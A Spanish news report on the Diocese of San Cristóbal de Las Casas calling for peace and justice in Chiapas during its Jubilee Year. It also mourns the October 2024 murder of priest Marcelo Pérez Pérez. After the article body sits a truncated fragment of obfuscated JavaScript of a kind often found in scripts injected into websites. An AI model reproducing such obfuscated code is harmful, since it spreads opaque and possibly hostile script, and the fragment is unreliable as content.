Diócesis de San Cristóbal de Las Casas llama a la paz y justicia en su Año Jubilar

Óscar Gómez/ Corresponsal

3 de noviembre del 2024. San Cristóbal de Las Casas.- En un mensaje dirigido a todo el pueblo de México, la Diócesis de San Cristóbal de Las Casas celebró el centenario del nacimiento de jTatic Samuel, “un líder que sembró semillas de justicia, verdad y esperanza en la comunidad. En el marco de este Año Jubilar”, donde reafirmó su compromiso de continuar el camino hacia la justicia social y la paz en un estado marcado por la violencia y la injusticia.

Durante diversos pronunciamientos que realizaron en el parque de San Cristóbal, durante la celebración de la misa dominical, después de una peregrinación a la que acudieron miles de personas, la diócesis denunció la grave situación de violencia en Chiapas, especialmente en las regiones de Frontera Sierra, Soconusco, Costa, Ocosingo, Fraylesca, Valles Selva y Altos, “lugares que han sido testigos de muertes, desapariciones de niñas, niños y jóvenes, así como de extorsiones y desplazamientos forzados, fenómenos que continúan afectando a la población”.

Con profundo pesar, la diócesis lamentó el asesinato del presbítero Marcelo Pérez Pérez, ocurrido el 20 de octubre de 2024, pues su generosa entrega y compromiso pastoral dejo una huella imborrable en el corazón de la comunidad. “Ante este acto de violencia, la Diócesis no se quedó de brazos cruzados; en cambio, reafirmó su determinación de trabajar por un Chiapas en paz y con dignidad”.

“Invitamos a todos a exigir un alto total a la violencia en Chiapas. La verdad nos hará libres”, enfatizó el vocero de la Diócesis, instando a la población a unirse en la búsqueda de justicia y paz. La Diócesis de San Cristóbal de las Casas continúa su labor en la construcción de un futuro mejor para todos, iluminada por la sabiduría de Dios en tiempos difíciles.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Un auto destrozado para frenar la imprudencia en la carretera de cuota

YolandaRodríguez/ corresponsal San Cristóbal de Las Casas, 02 de enero de 2026.– Un vehículo siniestrado …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *